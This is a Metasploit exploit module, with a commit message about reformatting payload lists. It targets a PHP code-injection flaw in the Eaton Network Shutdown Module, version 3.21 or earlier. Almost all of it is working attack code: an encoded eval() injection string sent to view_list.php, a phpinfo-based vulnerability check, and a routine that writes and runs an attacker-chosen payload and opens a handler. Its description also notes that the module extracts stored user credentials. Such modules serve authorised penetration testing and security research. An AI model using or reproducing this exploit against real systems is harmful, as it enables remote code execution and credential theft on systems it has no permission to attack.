Tod Beardsley
c547e84fa7
According to the Ruby style guide, %w{} collections for arrays of single
words are preferred. They're easier to type, and if you want a quick
grep, they're easier to search.
This change converts all Payloads to this format if there is more than
one payload to choose from.
It also alphabetizes the payloads, so the order can be more predictable,
and for long sets, easier to scan with eyeballs.
See:
https://github.com/bbatsov/ruby-style-guide#collections
116 lines
3.2 KiB
Ruby
116 lines
3.2 KiB
Ruby
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
include Msf::Exploit::PhpEXE
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Network Shutdown Module (sort_values) Remote PHP Code Injection',
|
|
'Description' => %q{
|
|
This module exploits a vulnerability in Eaton Network Shutdown Module
|
|
version <= 3.21, in lib/dbtools.inc which uses unsanitized user input
|
|
inside a eval() call. Additionally the base64 encoded user credentials
|
|
are extracted from the database of the application. Please note that
|
|
in order to be able to steal credentials, the vulnerable service must
|
|
have at least one USV module (an entry in the "nodes" table in
|
|
mgedb.db)
|
|
},
|
|
'Author' =>
|
|
[
|
|
'h0ng10', # original discovery, msf module
|
|
'sinn3r' # PhpEXE shizzle
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
['OSVDB', '83199'],
|
|
['URL', 'http://secunia.com/advisories/49103/']
|
|
],
|
|
'Payload' =>
|
|
{
|
|
'DisableNops' => true,
|
|
'Space' => 4000
|
|
},
|
|
'Platform' => %w{ linux php },
|
|
'Arch' => ARCH_PHP,
|
|
|
|
'Targets' =>
|
|
[
|
|
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
|
|
[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
|
|
],
|
|
'DefaultTarget' => 0,
|
|
'Privileged' => true,
|
|
'DisclosureDate' => 'Jun 26 2012'
|
|
))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(4679)
|
|
], self.class)
|
|
end
|
|
|
|
def check
|
|
# we use a call to phpinfo() for verification
|
|
res = execute_php_code("phpinfo();die();")
|
|
|
|
if not res or res.code != 200
|
|
print_error("Failed: Error requesting page")
|
|
return CheckCode::Unknown
|
|
end
|
|
|
|
return CheckCode::Vulnerable if (res.body =~ /This program makes use of the Zend/)
|
|
return CheckCode::Safe
|
|
end
|
|
|
|
def execute_php_code(code, opts = {})
|
|
param_name = rand_text_alpha(6)
|
|
padding = rand_text_alpha(6)
|
|
url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"
|
|
|
|
res = send_request_cgi(
|
|
{
|
|
'uri' => '/view_list.php',
|
|
'method' => 'POST',
|
|
'vars_get' =>
|
|
{
|
|
'paneStatusListSortBy' => url_param,
|
|
},
|
|
'vars_post' =>
|
|
{
|
|
param_name => Rex::Text.encode_base64(code),
|
|
},
|
|
'headers' =>
|
|
{
|
|
'Connection' => 'Close',
|
|
}
|
|
})
|
|
end
|
|
|
|
def no_php_tags(p)
|
|
p = p.gsub(/^<\?php /, '')
|
|
p.gsub(/ \?\>$/, '')
|
|
end
|
|
|
|
def exploit
|
|
print_status("#{rhost}:#{rport} - Sending payload")
|
|
|
|
unlink = (target['Platform'] == 'linux') ? true : false
|
|
p = no_php_tags(get_write_exec_payload(:unlink_self => unlink))
|
|
|
|
execute_php_code(p)
|
|
handler
|
|
end
|
|
end
|
|
|